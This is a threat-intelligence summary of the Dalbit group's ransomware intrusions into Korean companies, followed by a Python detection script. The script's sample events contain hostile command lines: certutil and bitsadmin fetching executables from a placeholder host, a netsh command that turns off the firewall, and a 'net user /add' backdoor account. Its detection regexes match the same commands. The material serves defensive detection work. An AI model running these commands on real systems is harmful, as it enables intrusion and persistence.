2023-02-23

Dalbit Threat Group Runs Attack Campaigns Against Korean Companies

Category: Threat Actor Activity | Industries: Automotive, Chemical, Construction, Consulting, Education, Energy, Food & Beverage, Hospitality, Industrial, Manufacturing, Media, Retail, Technology, Transportation | Level: Tactical | Source: ASEC

Researchers from the ASEC analysis team report on a threat group tracked as Dalbit that targets Korean companies to deploy ransomware. Since 2022, Dalbit has been responsible for at least 50 attacks against industries including technology, industrial, chemical, construction, automotive, manufacturing, education, and media, among others. Most of the companies attacked are mid- to small-sized. Several of the tools Dalbit frequently deploys, including a proxy tool, came from the Chinese community and are assessed to have "a partial connection with China."

To obtain initial access, the attackers often exploit vulnerabilities to drop web shells such as Godzilla, ASPXSpy, AntSword, and China Chopper. "In particular, 30% of the affected companies were found to have been using a certain Korean groupware product." Dalbit actors are documented to have exploited the WebLogic vulnerability CVE-2017-10271. Once inside the environment, Dalbit operators use certutil and Bitsadmin to drop tools that support privilege escalation, reconnaissance, and command and control (C2) communication. After escalating privileges with the Potato family of exploits (BadPotato, JuicyPotato, SweetPotato, RottenPotato, EFSPotato), the operators disabled firewall settings and added a new account for persistence. With elevated privileges and weakened network defenses, the threat actors established C2 communication through their proxy tool and collected credentials, emails, and other valuable data for extortion.
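
As an added illustration of how a defender might surface the native-tool abuse described above (example code, not ASEC's or Anvilogic's detection content), the following Python rules flag certutil/bitsadmin tool transfers, firewall disabling and local account creation in constructed process-creation events, then escalate any host where more than one of those stages appears. The regex patterns, event field names and sample command lines are assumptions.

```python
import re
from collections import defaultdict

# Hypothetical command-line patterns for the stages the report describes:
# tool drops via certutil/bitsadmin, firewall disabling, account creation.
RULES = {
    "ingress_tool_transfer": re.compile(
        r"\b(certutil(\.exe)?\s+.*-urlcache|bitsadmin(\.exe)?\s+/transfer)\b", re.I),
    "firewall_disabled": re.compile(
        r"\bnetsh\s+advfirewall\s+set\s+\w+\s+state\s+off\b", re.I),
    "local_account_added": re.compile(
        r"\bnet(1)?(\.exe)?\s+user\s+\S+(\s+\S+)?\s+/add\b", re.I),
}


def classify(command_line: str) -> list[str]:
    """Return the names of every rule that matches one command line."""
    return [name for name, rx in RULES.items() if rx.search(command_line)]


def correlate(events, host_key="host"):
    """Group rule hits per host and return only hosts that matched two or
    more distinct stages, i.e. native-process abuse progressing toward
    actions on objectives rather than a single noisy admin command."""
    stages = defaultdict(set)
    for ev in events:
        for name in classify(ev["cmd"]):
            stages[ev[host_key]].add(name)
    return {h: sorted(s) for h, s in stages.items() if len(s) >= 2}


# Constructed sample process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "web01", "cmd": "certutil.exe -urlcache -split -f "
                            "http://example.invalid/t.exe C:\\Windows\\Temp\\t.exe"},
    {"host": "web01", "cmd": "netsh advfirewall set allprofiles state off"},
    {"host": "web01", "cmd": "net user svc_backup /add"},
    {"host": "ws07", "cmd": "bitsadmin /transfer job /download /priority high "
                           "http://example.invalid/a.dat C:\\a.dat"},
    # Benign certutil use: hashing a file, no download switch.
    {"host": "ws07", "cmd": "certutil -hashfile C:\\installer.msi SHA256"},
]

if __name__ == "__main__":
    for host, hits in correlate(SAMPLE_EVENTS).items():
        print(f"{host}: escalate, stages={hits}")
```

Only web01 is escalated; ws07 shows a single tool-transfer hit, which a triage queue might still review but does not by itself indicate the full chain.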

Anvilogic Scenario:

  • Abuse of Native Processes Leads to Actions on Objectives

Anvilogic Use Cases:

  • WebLogic CVE-2017-10271
  • Potential Web Shell
  • China Chopper Web Shell
